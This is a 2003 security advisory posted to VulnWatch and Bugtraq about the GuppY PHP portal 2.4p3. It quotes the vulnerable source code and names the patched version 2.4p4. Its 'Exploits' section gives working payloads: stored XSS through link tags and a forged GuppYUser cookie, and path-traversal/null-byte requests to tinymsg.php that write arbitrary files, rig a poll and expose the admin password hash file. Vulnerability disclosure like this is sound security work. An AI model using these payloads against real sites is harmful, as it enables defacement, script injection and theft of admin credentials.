[VulnWatch] GuppY : XSS, Files Reading/Writing
From: Frog Man (leseulfrog_at_hotmail.com)
Date: 10/05/03
- Previous message: Frog Man: "[VulnWatch] EMML, EMGB : Include() hole"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com Date: Sun, 05 Oct 2003 18:24:39 +0200
Informations :
°°°°°°°°°°°°°
Language : PHP
Bugged Version : 2.4p3 (and less ?)
Patched version : 2.4p4
Website : http://www.freeguppy.org
Problems :
- Permanent XSS
- Files Reading
- Files Writing
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
postguest.php :
--------------------------------------------------------------------------------------------------------------------
[...]
$ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/l\\]", "<a
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/L\\]", "<a
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/l\\]", "<a
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/L\\]", "<a
href=\"http://www.\\1\" target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\"
target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\"
target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/l\\]","<a href=\"\\1\"
target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/L\\]","<a href=\"\\1\"
target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a
href=\"\\1\" target=_blank>\\2</a>",$ptxt);
$ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a
href=\"\\1\" target=_blank>\\2</a>",$ptxt);
$ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a
href=\"\\1\" target=_blank>\\2</a>",$ptxt);
$ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a
href=\"\\1\" target=_blank>\\2</a>",$ptxt);
[...]
--------------------------------------------------------------------------------------------------------------------
inc/includes.inc, inc/includes_IIS.inc :
-------------------------------------------------------------------------------
[...]
$usercookie = "GuppYUser";
$userprefs = array();
if (!empty($HTTP_COOKIE_VARS[$usercookie])) {
$userprefs = explode("||",$HTTP_COOKIE_VARS[$usercookie]);
$userprefs[0] = strip_tags($userprefs[0]);
$userprefs[1] = strip_tags($userprefs[1]);
$userprefs[2] = strip_tags($userprefs[2]);
$userprefs[3] = strip_tags($userprefs[3]);
$userprefs[4] = strip_tags($userprefs[4]);
$userprefs[5] = strip_tags($userprefs[5]);
$userprefs[6] = strip_tags($userprefs[6],"<br>");
if (($userprefs[0] == $lang[0] || $userprefs[0] == $lang[1]) &
empty($lng)) {
$lng = $userprefs[0];
}
}
[...]
-------------------------------------------------------------------------------
inc/functions.php :
--------------------------------------------------------------
[...]
function ReadDBFields($fic) {
global $connector;
$DataDB = Array();
if (FileDBExist($fic)) {
$DataDB = file($fic);
for ($i = 0; $i < count($DataDB); $i++) {
$Fields[$i] = explode($connector,trim($DataDB[$i]));
}
}
return $Fields;
}
function WriteDBFields($fic,$Fields) {
global $connector;
$fhandle = fopen($fic, "w");
$DataDB = "";
for ($i = 0; $i < count($Fields); $i++) {
for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) {
$DataDB .= trim($Fields[$i][$j]).$connector;
}
$DataDB .= trim($Fields[$i][count($Fields[$i])-1])."\n";
}
fputs($fhandle, $DataDB);
fclose($fhandle);
}
[...]
--------------------------------------------------------------
tinymsg.php :
-----------------------------------------------------------------------------------------------------------------------------
[...]
elseif ($action == 2) {
[...]
$dbmsg[0][0] = 0;
$dbmsg[1][0] = $from;
$dbmsg[1][1] = GetCurrentDateTime();
$dbmsg[1][2] = PutBR(RemoveConnector(stripslashes($msg)));
WriteDBFields($userep.$to.$dbext,$dbmsg);
}
[...]
elseif ($action == 3) {
?>
[...]
$dbmsg = Array();
if (FileDBExist($userep.$userprefs[1].$dbext)) {
$dbmsg = ReadDBFields($userep.$userprefs[1].$dbext);
for ($i = 1; $i < count($dbmsg); $i++) {
?>
<p><? echo $web6; ?> <b><? echo $dbmsg[$i][0]; ?></b> <? echo $web7."
".FormatDate($dbmsg[$i][1]); ?></p>
<p><? echo $dbmsg[$i][2]; ?></p>
<?
if ($dbmsg[$i][0] != $web214) {
?>
<p align="center">[ <A href ="javascript:PopupWindow('tinymsg.php?lng=<?
echo $lng; ?>&action=1&to=<? echo $dbmsg[$i][0]; ?>&from=<? echo
$userprefs[1]; ?>','tinywrite',330,245,'no','no')"><? echo $web140; ?></A>
]</p>
<?
}
?>
<hr>
[...]
-----------------------------------------------------------------------------------------------------------------------------
Exploits :
°°°°°°°°
- [l]" style="background:url('javascript:[SCRIPT]');visibility:hidden;[/l]
- [l][l] style=list-style:url(javascript:[SCRIPT]) truc=[/l][/l]
- With a cookie named "GuppYUser" and with the value :
fr||[NICK]||[MAIL]||LR||||on||<br
style="background:url('javascript:[SCRIPT]')">, if you send a message
(forum, guestbook,...) the javascript is executed.
- http://[target]/tinymsg.php?action=2&from=Youpi!||Great
!||rose||10000&msg=1&to=../poll
will add a possibility to the current poll : "Youpi!" with the pink color
("rose" in french) and a score of 10000.
-
http://[target]//tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2
will write into http://[target]/tadaam.html the line :
0\nyoupi1||[DATE+HEURE]||youpi2
- The cookie named "GuppYUser" and with the value :
fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1
sent to the page : http://[target]/tinymsg.php?action=3 will show the
source of the file http://[target]/admin/mdp.php (containing the md5-crypted
admin password).
Patch/More Details :
°°°°°°°°°°°°°°°°°°
http://www.phpsecure.info
frog-m@n
_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail
- Previous message: Frog Man: "[VulnWatch] EMML, EMGB : Include() hole"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
